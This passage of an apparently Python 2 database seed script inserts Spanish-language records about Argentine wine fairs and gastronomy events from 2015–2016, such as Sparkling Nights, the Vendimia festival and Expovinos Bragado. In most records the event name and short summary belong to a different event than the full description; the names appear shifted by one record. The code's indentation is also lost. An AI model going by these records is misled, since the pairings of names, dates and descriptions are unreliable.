return True
def b():
from datetime import datetime
fdate='%d/%m/%Y'
try:
db.evento.insert(
fecha=datetime.strptime('9/11/2016',fdate), fecha_fin=datetime.strptime('11/11/2016',fdate), precio='$420', direccion='Hotel Panamericano - Ciudad de Buenos Aires.', detalle='''Sparkling Nights es la única feria de la Argentina dedicada exclusivamente a los espumantes. Esta será su octava edición.
Durante 3 días, 35 de las bodegas más prestigiosas de la Argentina ofrecerán a los amantes del champagne la posibilidad de degustar más de 200 variedades, para conocer las últimas tendencias y todas las novedades que ofrece este año el creciente mercado de los vinos espumantes.
La cita será en el elegante Hotel Panamericano de Buenos Aires, del 9 al 11 de noviembre, entre las 18 y las 23 horas.
Algunas de las bodegas que participarán en esta edición 2016 son las siguientes: Chandon, Norton, Catena Zapata, Casa Bianchi, Salentein, Altavista, Rosell Boher, Luigi Bosca, Freixenet, Argento, Estancia Mendoza , Navarro Correas, Familia Schroeder, Trapiche, Sophenia, Nieto Senetiner, Vistalba, Las Perdices, Finca La Linda, La Riojana, Secreto Patagónico, Dante Robino, Familia Zuccardi y Sáenz Briones, entre otras.
Sparkling Nights también ofrecerá a los asistentes la posibilidad de degustar una amplia variedad de delicatessen y productos gourmets: habrá quesos, sushi, patisserie, infusiones, chocolates y finger foods.
La entrada cuesta 420 pesos y con la misma se entrega una copa de champagne para la degustación.''', nombre = 'FIESTA NACIONAL DE LA VENDIMIA 2016',caracteristicas= ' 80ª Fiesta Nacional de la vendimia, conmemora el esfuerzo y trabajo del viñatero mendocino. Diez noches de espectáculos con la inclusión de shows de nivel nacional, ceremonias y visitas a bodegas y viñedos. Los principales actos programados son ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18377_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('17/3/2016',fdate),
fecha_fin=datetime.strptime('19/3/2016',fdate), direccion='Mendoza', detalle='''El Rally de la Bodegas en su 14ª Edición consecutiva, organizado por el CLUB MENDOZA CLÁSICOS & SPORT es uno de los eventos de mayor importancia de autos históricos del país. Comenzó una nueva etapa con el acuerdo alcanzado con CLARAMUNT GARAGE que realza el culto por el automovilismo histórico en un marco de curada hospitalidad.
El RDLB es un evento que fusiona la pasión por los autos clásicos sport, las rutas del vino con sus modernas e innovadoras bodegas y los más espectaculares paisajes mendocinos.
Un acontecimiento de nivel internacional en el que los participantes disfrutan de toda la excelencia de esta competencia en el marco ideal que brinda la Cordillera de Los Andes.
Viñedos, gastronomía gourmet al pie de la montaña y exhibiciones de Polo, son parte del atractivo que conjugan una exigente competencia con un evento social de alto nivel.
Circuitos de montaña absolutamente de asfalto, especiales entre los viñedos, siempre en el ámbito de la regularidad, manteniendo promedios inferiores a 50 km/h.
La Fédération Internationale des Véhicules Anciens (FIVA) ha incluido el evento a su calendario internacional, compartiendo así con las manifestaciones de mayor relevancia de todo el mundo. Sólo automóviles sport, con su pasaporte de homologación FIVA son aceptados a participar del evento.
Este rally es puntuable para el Campeonato Argentino de Regularidad Sport del ACA y la Triple Corona, para el piloto de mejor performance entre el Rally de las Bodegas, el Rally de la Montaña y las 1000 Millas Sport.''', nombre = 'ARGENTINA WINE AWARDS 2016',caracteristicas= ' Planeado para evaluar y premiar la calidad y los avances de la industria vitivinícola argentina, el Argentina Wine Awards ha ganado su lugar como el certamen más importante en la agenda local y gana cada vez más adeptos de otros rincones del mundo ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18397_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('28/2/2016',fdate), fecha_fin=datetime.strptime('8/3/2016',fdate), precio='Desde $80.', direccion='Ciudad de Mendoza', detalle='''80ª Fiesta Nacional de la vendimia, conmemora el esfuerzo y trabajo del viñatero mendocino. Diez noches de espectáculos con la inclusión de shows de nivel nacional, ceremonias y visitas a bodegas y viñedos. Los principales actos programados son los siguientes:
• 28 Febrero (Domingo): “Bendición de los Frutos”. Ceremonia donde se agradece a Dios los frutos sanos obtenidos de la cosecha. Se ofrece el vino nuevo procediéndose al “Golpe en la Reja del Arado”, que simboliza al hombre que labra la tierra, bajo la advocación de la Virgen de la Carrodilla y la bendición del fruto nuevo.
• 4 Marzo (Viernes): “Vía Blanca de las Reinas”. Desfile de carros alegóricos lumínicos que transportan a las reinas tanto salientes como aspirantes al cetro nacional.
• 5 Marzo (Sábado): “Carrusel de la Vendimia”. Por la mañana desfilan los mismos carruajes, pero escoltados por agrupaciones gauchas con trajes típicos, montados a caballo, destacándose la tradicional carreta tirada por bueyes.
• 5 Marzo (Sábado): “Acto Central”. Espectáculo donde se realizan bailes folclóricos con más de mil bailarines en el escenario, representaciones artísticas, juegos de luces y sonido. Tiene lugar la elección y coronación de la reina nacional vendimial. Termina con un espectáculo de fuegos artificiales lanzados desde el “Cerro de la Gloria”.
• 6 Marzo (Domingo): “Segunda Noche”. Se repite el espectáculo artístico del Acto Central pero sin la elección de la reina nacional de la vendimia. Se presentan actuaciones en vivo de artistas reconocidos a nivel nacional e internacional.
• 7 Marzo (Lunes): “Tercera Noche”. Repetición del Acto Central con actuaciones en vivo de reconocidos artistas.
• 8 Marzo (Martes): “Cuarta Noche”. Repetición del Acto Central con actuaciones en vivo de reconocidos artistas.
Más información: www.mendoza.gov.ar"''', nombre = 'JUMBO DELI & WINE 2015',caracteristicas= ' Tribuna Plaza será nuevamente la sede de la tradicional Feria Jumbo Deli & Wine, que cumple su cuarto año consecutivo en Buenos Aires, presentando toda la propuesta gourmet y productos premium que ofrece en sus góndolas durante todo el año. U ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18424_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('4/11/2015',fdate), fecha_fin=datetime.strptime('6/11/2015',fdate), precio='$224', direccion='Hotel Panamericano de la Ciudad de Buenos Aires.', detalle='''Sparkling Nights es la única feria de la Argentina dedicada exclusivamente a los espumantes.
Durante tres días, 40 de las bodegas más prestigiosas de la Argentina ofrecerán a los amantes del champagne la posibilidad de degustar más de 200 variedades, para conocer las últimas tendencias y todas las novedades que ofrece este año el creciente mercado de los vinos espumantes.
La cita será en el elegante Hotel Panamericano de la Ciudad de Buenos Aires, del 4 al 6 de Noviembre, entre las 18 y las 23 horas.
Algunas de las bodegas que participarán en esta edición son las siguientes: Chandon, Norton, Catena Zapata, Casa Bianchi, Familia Zuccardi, Altavista, Cruzat, Rosell Boher, Mumm, Luigi Bosca, Séptima, Argento, Dante Robino, Alamos, Estancia Mendoza, Familia Schroeder, Finca Las Moras, Amalaya, Casarena, Nieto Senetiner, Las Perdices, La Riojana, Secreto Patagónico, Humberto Canale y Domaine Bousquet, entre otras.
Sparkling Nights también ofrecerá a los asistentes la posibilidad de degustar una amplia variedad de delicatessen y productos gourmet: habrá quesos, sushi, patisserie, café, chocolates y finger foods.
Sparkling Nights es organizada por Planeta Joy, el sitio de gastronomía, vinos y lifestyle más prestigioso de la Argentina."''', nombre = 'SPARKLING NIGHTS 2015',caracteristicas= ' Sparkling Nights es la única feria de la Argentina dedicada exclusivamente a los espumantes. Durante tres días, 40 de las bodegas más prestigiosas de la Argentina ofrecerán a los amantes del champagne la posibilidad de degustar más de 200 var ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18448_default_medium.jpeg','rb'))
except Exception as e:
print e
return True
def c():
from datetime import datetime
fdate='%d/%m/%Y'
try:
db.evento.insert(
fecha=datetime.strptime('7/9/2015',fdate), precio='Únicamente con invitación', direccion='Algodon Mansion, Montevideo 1647, CABA', detalle='''Llega la tercera edición de la Feria de Vinos de San Rafael. El próximo lunes 7 de septiembre tendrá lugar la tercera edición de la Feria de Vinos de San Rafael, con el objetivo que esta emblemática región de la producción de vinos de nuestro país se ha propuesto desde sus inicios: acercar su identidad al público de Buenos Aires, a representantes de los puntos de venta y a la prensa especializada, consolidando su posicionamiento. Por tercer año consecutivo, las principales bodegas de dicha región se reúnen en un solo lugar para compartir sus novedades y los sabores de su terroir.
El encuentro tendrá lugar el lunes 7 de septiembre en Algodon Mansion, Montevideo 1647, en diferentes horarios según el público y con invitación exclusiva. Las bodegas participantes son Bodega Alfredo Roca, Algodon Wine Estates, Bodegas Lavaque, Bodega Bombal y Aldao, Finca Dinamia, Funckenhausen Vineyards, Bodega Goyenechea, Bodegas Iaccarini, Bodega Jean Rivier, Casa Bianchi, FOW-Fabricio Orlando Winemaker y Bodegas Suter, que nuevamente ofrecerá en la barra innovadores cocktails a base de vino, uno de los hits de la edición 2014. Como novedad, se suma la bodega Mumm Domain, uno de los prestigiosos exponentes de los productores de espumantes de alta gama que la región brinda al mercado.
Características del terroir
San Rafael es un terroir con más de dos siglos de historia y con características que lo hacen único: su ubicación en el sur mendocino; clima templado continental semiárido y una marcada amplitud térmica; una moderada cercanía con la Cordillera de los Andes, que lo convierte en tributario de las aguas provenientes de los ríos Atuel y Diamante, conducidas por sistemas de riego y acequias creadas por la industriosa mano mendocina y que a la vez asegura el reparo de las fuertes heladas; la altura sobre el nivel del mar, que oscila entre los 600 y los 800 m; escasas precipitaciones y baja humedad ambiente, junto a suelos profundos, permeables y pobres en materia orgánica; una gran proporción de días soleados. Finalmente su gente, el mayor de sus tesoros, que continúa una larga tradición vitivinícola y el amor al vino y a su tierra en el sur de la provincia de Mendoza. Todas condiciones decisivas para el logro de vinos de excelencia.
La presencia de bodegas familiares también es parte de la identidad de esta zona, con sus establecimientos, sus tradiciones y sus productos, que se ha adaptado a las exigencias de los mercados y los consumidores actuales, sin abandonar sus mejores prácticas.
DATOS
Fecha: lunes 7 de septiembre de 2015
Lugar: Algodon Mansion, Montevideo 1647, CABA.
Entradas: únicamente con invitación.
Horario de trade y sommeliers: 14 a 16 hs
Horario de prensa: 16 a 18 hs
Horario de invitados especiales: 18 a 21 hs."''', nombre = 'VINOS Y BODEGAS 2015',caracteristicas= ' Una nueva experiencia para los sentidos llega a La Rural de la mano de Vinos y Bodegas. Del 24 al 26 de septiembre, de 18 a 23hs. en el Pabellón Frers, más de 40 bodegas argentinas presentarán sus novedades y productos, en un espacio especialmente ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18450_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('14/8/2015',fdate), fecha_fin=datetime.strptime('16/8/2015',fdate), direccion='Municipalidad de Bragado. Alsina 178, Bragado.', detalle='''En agosto llega la décima edición de la exposición de vinos más reconocida del interior del país. Una propuesta cultural, turística y enogastronómica única en la provincia de Buenos Aires.
Expovinos Bragado continúa con su objetivo de acercar el mundo del vino y el buen vivir al interior del país, generando un espacio de disfrute, promoción y divulgación. Del 14 al 16 de agosto, la décima edición de la exposición de vinos más reconocida tendrá lugar en el Palacio Municipal de Bragado (Alsina 178, Bragado, Provincia de Buenos Aires).
Durante tres días los visitantes de Expovinos Bragado podrán disfrutar de las etiquetas de más de 20 bodegas, productos gourmet, aceites de oliva, un espacio de alta gama con etiquetas Premium, un almacén de promociones con importantes descuentos, muestras de arte y más.
Además, en las vísperas de la feria se podrá disfrutar de ciclos de música y teatro, un encuentro de ceremonial y protocolo, el abierto de vinos y golf, y el imponente “Cóctel a orillas del viento”, un evento en el Club Náutico de Bragado. Con la laguna como marco, vinos, espumosos y una selección de productos gourmet para disfrutar al aire libre.
Estarán presentes aportando su energía y buen humor, Juan Braceli y Juan Ferrara de Cocineros Argentinos, realizando demostraciones de cocina.
Comprometidos con el municipio, parte de lo recaudado será a total beneficio de una institución bragadense. Además, continúa la campaña de concientización “Beber con estilo”, que promueve la cultura de la responsabilidad y moderación al beber.
Más información en www.expovinosbragado.com.ar"''', nombre = 'VINOS DE SAN RAFAEL',caracteristicas= ' Llega la tercera edición de la Feria de Vinos de San Rafael. El próximo lunes 7 de septiembre tendrá lugar la tercera edición de la Feria de Vinos de San Rafael, con el objetivo que esta emblemática región de la producción de vinos de nuestro ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18517_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('17/8/2015',fdate), fecha_fin=datetime.strptime('22/8/2015',fdate), direccion='Ciudad de Buenos Aires', detalle='''Del 17 al 22 de agosto, Buenos Aires tendrá su primera semana dedicada a la coctelería. Una propuesta que reúne a más de 40 bares y restaurantes, decenas de bartenders, centenares de tragos a precios promocionales, clases maestras, conferencias, recorridos de bares y degustaciones. Un nuevo evento cultural en la agenda porteña, que busca reconocer a la ciudad como la gran capital sudamericana de la coctelería.
La coctelería es un hito cultural, que atraviesa a la ciudad en múltiples escenarios. En sus bares y restaurantes, en los hoteles y en los hogares, en la televisión y en la radio, en los libros y en las revistas. En encuentros de amigos y en fiestas, en la previa de un asado y como relax de after office.
Todo esto confluye en Buenos Aires Cóctel:
- A lo largo de una semana, los mejores bares de la ciudad ofrecerán una carta especial de cócteles propios a valores promocionales, en la búsqueda acercar al público a la coctelería y a los bares, para que conozca y disfrute las mejores mezclas y bebidas.
- Cada día se sucederán clases maestras para amateurs y aficionados que quieran aprender sobre el mundo de las bebidas, además de múltiples eventos lúdicos y educativos en los bares participantes.
- Se suma una jornada de charlas y conferencias en la Universidad de Palermo, dirigida específicamente a profesionales, bartenders, gastronómicos y estudiantes, sobre los distintos aspectos que hacen al trabajo de la barra, la creación de un bar, el diseño de una marca, los procesos de destilación, entre otros temas.
- Todo bajo el concepto de consumo responsable, parte inherente del disfrute y del aprendizaje, con actividades especiales, comunicación específica y sugerencias de recorridos a pie.
Buenos Aires Cóctel. Del 17 al 22 de agosto, en toda la ciudad porteña.
Con el apoyo del Ente de Turismo de la Ciudad de Buenos Aires, la Universidad de Palermo y las empresas Grupo Cepas, Pernod Ricard, Diageo, Gruppo Campari, Moët Hennessy, Mitre Fortín, Phaedrus, CCU, Familia Zuccardi, Fratelli Branca y Catena Zapata.''', nombre = 'TERROIR CON HISTORIA 2015',caracteristicas= ' Del 17 al 22 de agosto, Buenos Aires tendrá su primera semana dedicada a la coctelería. Una propuesta que reúne a más de 40 bares y restaurantes, decenas de bartenders, centenares de tragos a precios promocionales, clases maestras, conferencias, ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18521_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('9/7/2015',fdate), fecha_fin=datetime.strptime('12/7/2015',fdate), precio='$80', direccion='La Rural - Av. Sarmiento 2704 - Palermo – Buenos Aires', detalle='''La feria Caminos y Sabores 2015 se realizará del 9 al 12 de julio en el predio de La Rural, en Buenos Aires. Las entradas ya están a la venta.
Caminos y Sabores es, más que una feria, una forma de apreciar nuestro país. Desde el jueves 9 al domingo 12 de julio de 2015 la principal feria que nuclea expositores de alimentos y artesanías de todo el país se desarrollará en dos pabellones de La Rural, en Buenos Aires.
Como desde hace once años, la feria Caminos y Sabores expone las raíces gastronómicas y culturales argentinas de la mano de productores y artesanos provenientes de todas las regiones del país.
En Caminos y Sabores el público puede acceder de primera mano a la historia de un determinado producto en el cual intervienen muchos protagonistas, familias y colaboradores, en una red de labores que se ha transmitido de generación en generación. Es así que una receta familiar se ve transformada en un producto regional al alcance del público.
Las Novedades/ Mucho más que un paseo de compras
En Caminos y Sabores 2015 se presenta un nuevo espacio gastronómico llamado “Maestros del Pan”, donde especialistas de la firma Calsa dispondrán sus conocimientos en materia de panificación para que en vivo y en directo elaboren panificaciones de la mejor calidad.
El rincón donde los cinco sentidos se concentran en la diversidad de aromas, colores y sabores para disfrutar de platos con fuerte raigambre en cada pueblo del interior siguen siendo la Cocina y el Taller de Elaboración de Alimentos regionales. Allí, dentro de una escenografía mágica que replica lo cotidiano, el público se deleita y aprende de los mejores representantes de cada región del país. A veces las aves, otras los frutos de mar, cuando no los cabritos, corderos y cerdos, siempre condimentados con los mejores frutos de las sierras, fortalecen el alma, recorriendo todo el cuerpo hasta llegar a la degustación y el aplauso merecido a los mejores expositores.
También sorprende en Caminos y Sabores 2015 la Plaza del Encuentro, un espacio donde se celebra la cultura a través de espectáculos representativos de la identidad de nuestro país y las tan vistosas Huertas, para que los visitantes puedan disfrutar del placer de cultivar desde el hogar.
La frutilla del postre viene de la mano del Concurso Experiencias del Sabor. Organizado por la Consultora STG, este concurso tiene como objetivo reconocer la calidad de aquellos productos que participan de la exposición y de premiar la excelencia del trabajo desarrollado durante todo el año. El jurado del Concurso, integrado por un panel de testeadores no videntes, está especializado en el análisis sensorial de alimentos.
Datos importantes:
Fecha: del 9 al 12 de julio de 2015
Horario: de 12 a 21 hs.
Lugar: La Rural - Av. Sarmiento 2704 - Palermo – Buenos Aires
Venta de entradas: En boletería de La Rural de 11:30 a 20:30 y on line en ticketek.com.ar
Valor de la entrada: $ 80 Menores de 5 años NO abonan entrada.
Descuentos y bonificaciones (exclusivos para el VIERNES 10 DE JULIO)
Jubilados: 2×1
Escuelas de Cocina: Vení vestido con tu chaqueta y obtené 2×1 en entradas
Estudiantes universitarios y terciarios de carreras afines (Gastronomía, hotelería, turismo, ingeniería en alimentos, etc.): 2×1 presentando libreta o constancia de alumno regular.
Escuelas primarias, sin cargo previa acreditación. Enviar previamente a la Organización una carta membretada con listado de alumnos, docentes a cargo (incluir N° de teléfono celular) con sello de la Institución. Enviarlo con anticipación al mail infocaminosysabores@caminosysabores.com.ar y llamar telefónicamente al (011) 5128 9800. Al ingresar a la feria, presentar el listado original en la zona de boleterías."''', nombre = 'BUENOS AIRES CÓCTEL 2015',caracteristicas= ' En agosto llega la décima edición de la exposición de vinos más reconocida del interior del país. Una propuesta cultural, turística y enogastronómica única en la provincia de Buenos Aires. Expovinos Bragado continúa con su objetivo de ace ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18602_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('6/6/2015',fdate), direccion='Hotel NH Tango. Ciudad de Buenos Aires.', detalle='''Quinta edición de la cata de vinos que busca juntar en una misma mesa a enólogos, sommeliers, especialistas, comunicadores y consumidores apasionados, para que en un ambiente distendido, aprendan unos de otros y en conjunto ayuden a difundir la cultura del vino. Como siempre, el gran objetivo es quitarle la solemnidad a la cata, volver a la esencia, disfrutar del vino y analizar sencillamente cual es el que gusta más. En 2011, el evento se realizó en torno al Malbec en el restaurante a puertas cerradas Treinta Sillas. Su repercusión sobrepaso las mejores expectativas: 30 cubiertos y 34 muestras diferentes de Malbec. En 2012, el tema fueron los Blends y en el restaurante Laurak Bat se reunieron 50 personas para degustar un total de 49 etiquetas de las diferentes regiones Argentinas. En 2013, nuevamente con el Malbec, 90 degustadores pudieron disfrutar de 64 etiquetas de Alta Gama en una inolvidable noche en el Hotel NH Tango. En 2014 fue el turno de los Cabernet (Sauvignon y Franc), donde 94 degustadores pudieron disfrutar de mas de 70 muestras de los distintos Cabernet que se dan en la Argentina. Este año la temática será nuevamente el Malbec. Nuestra cepa insignia, la que nos identifica en el mundo, la que podemos encontrar desde la Patagonia hasta los Valles Calchaquíes, con sus características propias y las que le imprime el terruño. El Desafío Federal 2015 se llevará a cabo el sábado 6 de Junio nuevamente en el Hotel NH Tango y constará de la cata a ciegas de 75 etiquetas de Malbec de alta gama, divididos en 3 categorías según su precio sugerido de venta al público. Como siempre, la cata será seguida de una de una cena distendida acompañada por los mismos vinos durante la cual se anunciarán los 6 preferidos de cada categoría. Este año, en el Desafío Federal también se premiará a la etiqueta más atractiva de todas las que serán degustadas, para de alguna manera premiar el esfuerzo y la creatividad de nuestros diseñadores, quienes también aportan con su trabajo a la venta y difusión de nuestros Malbec. Además en el mes de Julio se realizará la entrega de los diplomas a las bodegas que resulten premiadas, a la que serán invitadas las bodegas participantes y el periodismo a probar los 6 vinos premiados de cada categoría. Los 95 privilegiados que lograron conseguir una plaza para participar como degustadores (las mismas se agotaron en 72 horas) tendrán la oportunidad de degustar 75 muestras de malbec de entre 90 y 1100 pesos habrá exponentes de 8 provincias diferentes (Mendoza, Salta, Neuquén, Río Negro, Córdoba, La Rioja, Tucumán y La Pampa). Las bodegas que han confirmado su participación en el Desafío Federal 2015 son: Achaval Ferrer, Aleanna, Alta Vista, Altocedro, Altos las Hormigas, Amalaya, Atamisque, Bodega del Desierto, Bodega del Fin del Mundo, Bodega Enrique Foster, Bodega Posse, Bodega Séptima, Bodega SinFin, Bodega Toneles, Carinae, Chakana, Chaman, Clos de Chacras, Dante Robino, Domingo Molina, Dominio del Plata, Doña Paula, Durigutti, El Esteco, El Porvenir de Cafayate, Ernesto Catena Vineyards, Etchart, Familia Cassone, Finca Decero, Finca la Anita, Finca las Moras, Finca Sophenia, Gimenez Riili, Goyenechea, HDWines, Humanao, Impaciente, Insolente, Javier Collovati, Kaiken, Krontiras, La Mascota, Lagarde, Lamadrid, Las Perdices, Margot, Matías Riccitelli, Mauricio Lorca, Melipal, Miras, Mosquita Muerta Wines, Nieto Senetiner, Noble de San Javier, Norton, NQN, O. 
Fournier, Piatelli, Renacer, Pulenta Estate Riglos, Santonegro, Teho, Tempus Alba, Terrazas, Tintonegro, Trapiche, Trivento, Vicentin, Videla Dorna, Viña 1924 de Angeles, Viña Vida, Vistalba, Zorzal Wines y Zuccardi. Para más información comunicarse vía mail a info@eldesafiofederal.com.ar "''', nombre = 'EXPOVINOS BRAGADO 2015',caracteristicas= ' Del 24 al 26 de julio próximo, en Espacio Pilar (Chile 1963 – salida km 47 de Panamericana), vuelve la celebración gastronómica para disfrutar del “buen comer y beber”, probar –y comprar- ingredientes que transforman una comida en un plat ...,', imagen = open('C:\\imagenes\\eventos\\thumb_18656_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('1/7/2015',fdate), fecha_fin=datetime.strptime('3/7/2015',fdate), precio='$350', direccion='JA Vinoteca, Borges 1772, Palermo, CABA.', detalle='''La fuerza de la historia unida a una nueva generación de enólogos que cambiaron para siempre el rumbo de la vitivinicultura local. Matias Michelini: Passionate Wine - SuperUco Gerardo Michelini: Gen del Alma - SuperUco Juan Pablo Michelini: SuperUco Manuel Michelini: Plop Andrea Mufatto: Gen del Alma Luis Reginato: Chaman Wines - Reginato Espumantes David Bonomi: Tierra Inti - Per Se Edgardo Del Popolo: Per Se Ariel Angelini: Tupun Francisco Bugallo: Cara Sur Pablo Bassin: Fuego Blanco En formato de feria, 11 enólogos, más de 80 vinos y sus últimas creaciones Cuándo?: 1, 2 y 3 de Julio – 17 a 22hs Dónde?: JA Vinoteca, Borges 1772, Palermo, CABA Solo 80 entradas por día - Valor: $350 Puntos de Venta: Ozono Drinks - La Rioja 1823, Parque Patricios Vinoteca Taninos - Araoz 1227, Palermo JA - Borges 1772, Palermo Mr. Wines - Aranguren 1078, Caballito Alma de los Andes - Calle 44 nro. 857, La Plata Online: www.ozonodrinks.com.ar"''', nombre = 'ESPACIO GOURMET 2015 - SEGUNDA EDICIÓN',caracteristicas= ' La feria Caminos y Sabores 2015 se realizará del 9 al 12 de julio en el predio de La Rural, en Buenos Aires. Las entradas ya están a la venta. Caminos y Sabores es, más que una feria, una forma de apreciar nuestro país. Desde el jueves 9 al d ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51494_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('24/7/2015',fdate), fecha_fin=datetime.strptime('26/7/2015',fdate), precio='$50.-', direccion='Espacio Pilar Av. Chile 1963 Panamericana Ramal Pilar km 47', detalle='''
Del 24 al 26 de julio próximo, en Espacio Pilar (Chile 1963 – salida km 47 de Panamericana), vuelve la celebración gastronómica para disfrutar del “buen comer y beber”, probar –y comprar- ingredientes que transforman una comida en un plato inolvidable. Esta 2ª edición cuenta con el apoyo de la Municipalidad de Pilar y con el auspicio de Banco Provincia, que ofrecerá beneficios especiales para sus clientes.
En Espacio Gourmet, los Food Trucks estarán a la orden del día. Propuestas divertidas con diferentes variantes de cocina: árabe, mexicana, rápida, jugos de frutas con combinaciones exquisitas. Participan B.A. Foodtruck, María Félix, Moros en la Costa, Bonnyuzz, entre otros.
Los más destacados Chefs de Cuisine de la Escuela de Cocineros Gato Dumas ofrecerán clases abiertas para develar los “secretos” aun de los platos más sencillos y comunes, para que sean apreciados como el manjar más exquisito.
En el mercado se podrán descubrir y obtener los ingredientes más curiosos para que la comida de todos los días sea también especial: Gaby Matchel con sus mermeladas y chutneys también presentará su nuevo servicio de delivery, las pastas de grano duro de Paese di Sapore, las variedades más deliciosas de Quesoteca Burgos, Cervezas Jarva con sus sabores únicos, Vegie Milk y sus leches gourmet, Tea Me con los blends más originales, la propuesta más gourmet de productos para celíacos, entre otros. Utensilios y elementos originales de Ollas Essen, Metal Real con sus cubiertos, la artista plástica María Laura Pini con su “vajilla de autor”, los hornos artísticos de Cuisine, la artista textil Nadine Youssefian que auspiciada por Colibrí llevará sus manteles intervenidos, entre otros.
Además, como en la primera edición, Gorros Wine prepara “Los Caminos del Vino”, un paseo en el que se podrán degustar los vinos de las cepas más exclusivas. Un programa imperdible.
En el restaurante Los visitantes podrán disfrutar también las propuestas gourmet de Jean Paul Bondoux y Jérôme Mathe con su “Cuisine du Sud”, así como las de Art Catering, Tree Cocina, Brazzi Catering, Crepas, La Arepería de Buenos Aires, Pancho Bonito, GuiLab Laboratorio de Helados con sus helados moleculares realizados con nitrógeno líquido a la vista del público.
Arte PHOS y el Ente de Promoción de la Municipalidad de Pilar presentarán las fotografías ganadoras del concurso “La Sal de la Vida”, el primer concurso fotográfico de gastronomía gourmet, una especialidad muy particular en fotografía. Se convoca a mayores de 18 años, residentes en el territorio nacional, amantes de la fotografía y la gastronomía, profesionales y/o amateurs, que pueden presentar fotos sacadas con cualquier dispositivo sobre platos, ingredientes, presentaciones de gastronomía gourmet. Inscripción hasta el 6 de julio de 2015. Bases e informes en Facebook: La Sal de la Vida.
Dado que esta edición de Espacio Gourmet se realiza en plenas vacaciones de invierno, habrá un espacio para chicos con clases de cocina y otras actividades divertidas, especialmente pensadas para el “público menudo”.
Espacio Gourmet está pensada especialmente para un público “bon vivant” que conoce lo que le gusta y, a la vez, está abierto a descubrir nuevos sabores, nuevas texturas, a vivir nuevas experiencias placenteras. Sabores de autor, productos nobles y paladares delicados, todo junto en un solo lugar.
Espacio Gourmet es una propuesta que abarca desde sabores de autor, especias originales, productos nobles, nuevas texturas, nuevas formas de preparar y cocinar ingredientes tradicionales, hasta lo más novedoso en utensilios, mantelería, vajilla y cristalería, accesorios indispensables para enaltecer cualquier comida. Propuestas de maridajes excepcionales. Todo, en un solo lugar."''', nombre = 'CAMINOS Y SABORES 2015',caracteristicas= ' La fuerza de la historia unida a una nueva generación de enólogos que cambiaron para siempre el rumbo de la vitivinicultura local. Matias Michelini: Passionate Wine - SuperUco Gerardo Michelini: Gen del Alma - SuperUco Juan Pablo Michelini: SuperUc ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51495_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('27/4/2015',fdate), direccion='Casal de Catalunya. Chacabuco 863, San Telmo.', detalle='''
En conmemoración a la quinta celebracion del día internacional del Malbec, en el mes de Abril del 2015 les propondremos ser parte de +Wine Edition #2 bajo el slogan: "WE LOVE MALBEC" en donde, como ya es costumbre, contaremos con dos sectores de degustación. SALON ANTONI TAPIES: Vinos rosados tranquilos y espumantes elaborados a base de malbec SALON PAU CASALS: Varietales, blend y fortificados de malbec El lunes 27 el Casal de Catalunya con su imponente edificio sera participe de la muestra de vinos que revoluciona Buenos Aires. "
'''
,nombre = 'MEGA DEGUSTACIÓN ANUAL OZONO DRINKS 2015 - SEGUNDA EDICIÓN',caracteristicas= ' Quinta edición de la cata de vinos que busca juntar en una misma mesa a enólogos, sommeliers, especialistas, comunicadores y consumidores apasionados, para que en un ambiente distendido, aprendan unos de otros y en conjunto ayuden a difundir la cul ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51561_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('18/4/2015',fdate), precio='Venta de Entradas en Vinoteca Vides - Juan B Justo', direccion='Club Italiano (Neuquén Capital),', detalle='''Te invitamos a festejar el MALBEC WORLD DAY. No te lo pierdas este Sábado 18 de Abril en el Club Italiano de la Ciudad de Neuquén."''', nombre = 'DESAFÍO FEDERAL 2015',caracteristicas= ' Alta Gama Rosario vuelve del 4 al 6 de junio de 2015 para brindar por sus 11 años con un recorrido totalmente renovado en el ámbito de Terrazas del Paraná, en La Estación Fluvial de Rosario, presentando una gran cantidad de expositores. En 2015 A ...,', imagen = open('C:\\imagenes\\eventos\\thumb_51719_default_medium.jpeg','rb'))
db.evento.insert(
fecha=datetime.strptime('24/9/2015',fdate), fecha_fin=datetime.strptime('26/9/2015',fdate), precio='$200.-', direccion='Predio La Rural. Av. Santa Fe 4363.', detalle='''
Una nueva experiencia para los sentidos llega a La Rural de la mano de Vinos y Bodegas. Del 24 al 26 de septiembre, de 18 a 23hs. en el Pabellón Frers, más de 40 bodegas argentinas presentarán sus novedades y productos, en un espacio especialmente pensado para los amantes del buen beber.
Una propuesta moderna que invita a descubrir las distintas regiones productoras de vinos, a través de sus cepas y la oportunidad única de degustar cada una de ellas. Un encuentro con las nuevas tendencias donde se podrá disfrutar de las catas guiadas por la Escuela de Sommeliers del Gato Dumas, acceder a la tienda de vinos con una selección de etiquetas a cargo de Enogarage y descubrir la cocktelería con vino: bartenders de la ciudad incorporan la bebida a sus barras para la creación de tragos imperdibles que llegan para quedarse.
Los visitantes más foodies también tendrán su lugar en Vinos & Bodegas, a través del mercado gourmet, con productos destacados para transformar cada una de las comidas en verdaderos platos de autor. La propuesta se complementa con un sector de productos orgánicos de primera selección.
En el espacio al aire libre, la gastronomía será la protagonista con propuestas para todos los gustos: bar de tapas y finger food; que se suman a la novedosa propuesta de Food Trucks de La Cabrera, Los Petersen Cocineros, Street Food y Bon Bouquet, que ofrecerán innovadoras opciones de “gastronomía sobre ruedas”.
